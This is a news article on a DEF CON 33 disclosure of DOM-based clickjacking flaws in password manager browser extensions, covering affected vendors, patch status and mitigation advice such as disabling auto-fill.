A new security flaw could let attackers steal login credentials, credit card data, and two-factor codes from millions of users with a single click.
Independent researcher Marek Tóth has uncovered a vulnerability in popular password manager browser extensions that makes them susceptible to a type of clickjacking attack. The flaw, dubbed DOM-based extension clickjacking, was presented earlier this month at DEF CON 33. The vulnerability allows an attacker-controlled website to trick users into unintentionally triggering an auto-fill event, which could expose stored information including usernames, passwords, 2FA codes, and even credit card numbers.
Clickjacking, or UI redressing, is a well-known technique where attackers manipulate a website’s interface to get users to click on hidden elements. In this case, the attack targets browser extensions that inject auto-fill elements into the Document Object Model (DOM). Malicious scripts can make these elements invisible by setting their opacity to zero, while overlaying fake pop-ups or banners to draw the user’s click.
Tóth’s research tested 11 popular password manager extensions, including 1Password, iCloud Passwords, Bitwarden, Enpass, LastPass, and LogMeOnce. All were found vulnerable to some degree, with most allowing the theft of credentials and time-based one-time passcodes (TOTPs). Some scenarios also exposed passkey authentication.
Six vendors have yet to fully patch the flaws, although Bitwarden has released version 2025.8.0 to address the issue. Apple’s iCloud Passwords and Enpass are actively working on fixes, while 1Password and LastPass classified the findings as “informative.”
“A single click anywhere on an attacker-controlled website could allow attackers to steal users’ data,” Tóth said, warning that the technique could be adapted to other extensions beyond password managers.
Software security firm Socket, which reviewed the research, confirmed the severity and said it has reached out to US-CERT to assign CVE identifiers.
Until fixes are issued, Tóth recommends disabling auto-fill and switching browser extension permissions to “on click” for better control.
According to Malwarebytes Labs, the attack goes far beyond stealing login details. It “can also pilfer other information stored in password managers, including credit card information, personal data like your name and phone number, passkeys… and time-based one-time passwords (TOTP).” This makes the threat especially dangerous, as it targets multiple layers of authentication and sensitive personal data.
It’s a technique where attackers manipulate invisible elements injected by browser extensions into web pages, tricking users into unintentionally revealing stored information.
Traditional clickjacking hides or disguises webpage buttons, while DOM-based extension clickjacking specifically targets browser extension elements like auto-fill prompts.
The study looked at 11 extensions including 1Password, iCloud Passwords, Bitwarden, Enpass, LastPass, and LogMeOnce. All showed vulnerabilities.
Experts recommend disabling auto-fill, using copy/paste instead, and configuring extensions to work “on click” rather than automatically.
Yes. The researcher emphasized that the technique could be generalized to exploit other extensions that inject elements into the DOM.